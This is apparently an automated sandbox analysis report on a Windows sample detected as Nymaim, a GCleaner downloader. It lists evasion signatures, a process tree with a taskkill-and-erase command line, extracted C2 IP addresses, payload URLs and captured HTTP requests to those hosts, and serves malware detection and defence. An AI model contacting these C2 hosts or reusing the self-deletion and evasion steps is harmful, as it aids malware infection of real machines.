Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	791301
MD5:	14e09c7a5842688842f6c0bf61c17135
SHA1:	4c9e1cbcd933293268c396b3c79f3836665059a8
SHA256:	a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
Tags:	exe
Infos:

Detection

Nymaim

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Nymaim

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Obfuscated command line found

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality to launch a program with higher privileges

Uses taskkill to terminate processes

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5992 cmdline: C:\Users\user\Desktop\file.exe MD5: 14E09C7A5842688842F6C0BF61C17135)

file.tmp (PID: 6100 cmdline: "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe" MD5: D76329B30DB65F61D55B20F36B56DA26)

finalrecovery.exe (PID: 6076 cmdline: "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" MD5: 88A9155EB9D85157634ED38D128C877B)

6tohc1clzbcir.exe (PID: 1756 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)

cmd.exe (PID: 4488 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 5968 cmdline: taskkill /im "finalrecovery.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.finalrecovery.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.3250000.2.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.3250000.2.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Snort Signatures

ETPRO TROJAN GCleaner Downloader - Payload Response - Source IP: 45.12.253.72 - Destination IP: 192.168.2.3

Timestamp:	45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834
SID:	2852925
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe

ReversingLabs: Detection: 60%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Joe Sandbox ML: detected

Source: 1.2.file.tmp.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.3.file.exe.23675c8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.file.tmp.4b375c.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.file.exe.218b608.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.file.tmp.4b375c.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: 2.2.finalrecovery.exe.400000.1.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,	1_2_0045C524
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C5D8 ArcFourCrypt,	1_2_0045C5D8
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C5F0 ArcFourCrypt,	1_2_0045C5F0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_10001000 ISCryptGetVersion,	1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_10001130 ArcFourCrypt,	1_2_10001130
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,	2_2_00403770

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473B80
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,	1_2_00451DC0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_004963A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463080
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004634FC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461AF4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,	2_2_00423DAD
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,	2_2_10007E39

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 45.12.253.56
Source: Malware configuration extractor	IPs: 45.12.253.72
Source: Malware configuration extractor	IPs: 45.12.253.98
Source: Malware configuration extractor	IPs: 45.12.253.75

Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.12.253.72 45.12.253.72

Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72

Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/puk.php
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/puk.phpk
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.phpE
Source: finalrecovery.exe, 00000002.00000003.318212747.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.257203084.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.306066040.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.300076163.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.294050791.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.263266047.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323964971.00000000043F5000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.312209473.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.275530934.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.281620153.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.287669574.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.269177811.00000000043F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.php
Source: finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpI
Source: file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/
Source: file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/.
Source: file.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/b
Source: is-587OJ.tmp.1.dr	String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/psU

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

2_2_00401B40

Source: global traffic	HTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.324989126.0000000000638000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409420
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454800

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004083E4	0_2_004083E4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00466728	1_2_00466728
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0047EB9C	1_2_0047EB9C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0046F304	1_2_0046F304
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0043D388	1_2_0043D388
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004440A8	1_2_004440A8
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045E468	1_2_0045E468
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045A510	1_2_0045A510
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004447A0	1_2_004447A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004687A0	1_2_004687A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00434900	1_2_00434900
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00430B40	1_2_00430B40
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00444BAC	1_2_00444BAC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00484C90	1_2_00484C90
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450D1C	1_2_00450D1C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00443B00	1_2_00443B00
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00485BC4	1_2_00485BC4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00433BFC	1_2_00433BFC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0048BECC	1_2_0048BECC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042FFB4	1_2_0042FFB4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490	2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00409670	2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004056A0	2_2_004056A0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406800	2_2_00406800
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406AA0	2_2_00406AA0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404D40	2_2_00404D40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00405F40	2_2_00405F40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415053	2_2_00415053
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415285	2_2_00415285
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00422329	2_2_00422329
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00419490	2_2_00419490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004267D0	2_2_004267D0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404840	2_2_00404840
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004109D0	2_2_004109D0
